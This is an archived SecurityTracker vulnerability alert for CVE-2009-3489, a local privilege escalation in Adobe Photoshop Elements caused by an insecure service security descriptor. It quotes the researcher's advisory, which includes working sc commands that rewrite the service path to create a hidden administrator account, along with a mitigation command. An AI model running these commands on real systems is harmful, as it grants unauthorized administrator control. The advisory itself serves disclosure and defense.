SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Generic)  >   Adobe Photoshop Vendors:   Adobe Systems Incorporated
Adobe Photoshop Elements Lets Local Users Gain Elevated Privileges
SecurityTracker Alert ID:  1022963
SecurityTracker URL:  http://securitytracker.com/id/1022963
CVE Reference:   CVE-2009-3489   (Links to External Site)
Updated:  Nov 11 2009
Original Entry Date:  Sep 30 2009
Impact:   Execution of arbitrary code via local system, Root access via local system
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): Elements 7.0, 8.0
Description:   A vulnerability was reported in Adobe Photoshop Elements. A local user can obtain elevated privileges on the target system.

The Adobe Active File Monitor service is installed with an unsafe security descriptor. A local user in the 'Users' group can stop the service, invoke the 'sc config' command to replace the path with an arbitrary path, and then restart the service to execute arbitrary code with System privileges.

The original advisory is available at:

http://retrogod.altervista.org/9sg_adobe_pe_local.html

Nine:Situations:Group::bellick reported this vulnerability.

Impact:   A local user can obtain System privileges on the target system.
Solution:   No solution was available at the time of this entry.

The vendor has described a workaround in their advisory.

The vendor's advisory is available at:

http://www.adobe.com/support/security/bulletins/apsb09-17.html

Vendor URL:  www.adobe.com/support/security/bulletins/apsb09-17.html (Links to External Site)
Cause:   Configuration error
Underlying OS:   Windows (Any)

Message History:   None.


 Source Message Contents

Date:  Tue, 29 Sep 2009 10:38:22 -0600
Subject:  Adobe Photoshop Elements 8.0 Active File Monitor Service Bad

Adobe Photoshop Elements 8.0 Active File Monitor Service Bad Security Descriptor Local Elevation Of Privileges
by Nine:Situations:Group::bellick
site: http://retrogod.altervista.org/

Tested on Microsoft Windows XP SP3

The "Adobe Active File Monitor V8" service is installed with an improper security descriptor.
A malicious user of the Users group (which on xp means a "limited account") can stop the service,
then invoke the "sc config" command to replace the binary path with a value of choice, then restart
the service to run the command with SYSTEM privileges ex., run theese commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

now login as administrator with password "kills"

mitigation:

the security descriptor of the service is like this:

C:\>sc sdshow "AdobeActiveFileMonitor8.0"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

note the WO and WD permission for Everyone (!!!!!)

change the security descriptor like the following:

c:\sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS

readings, interesting article:
http://msmvps.com/blogs/erikr/archive/2007/09/26/set-permissions-on-a-specific-service-windows.aspx

original url: http://retrogod.altervista.org/9sg_adobe_pe_local.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC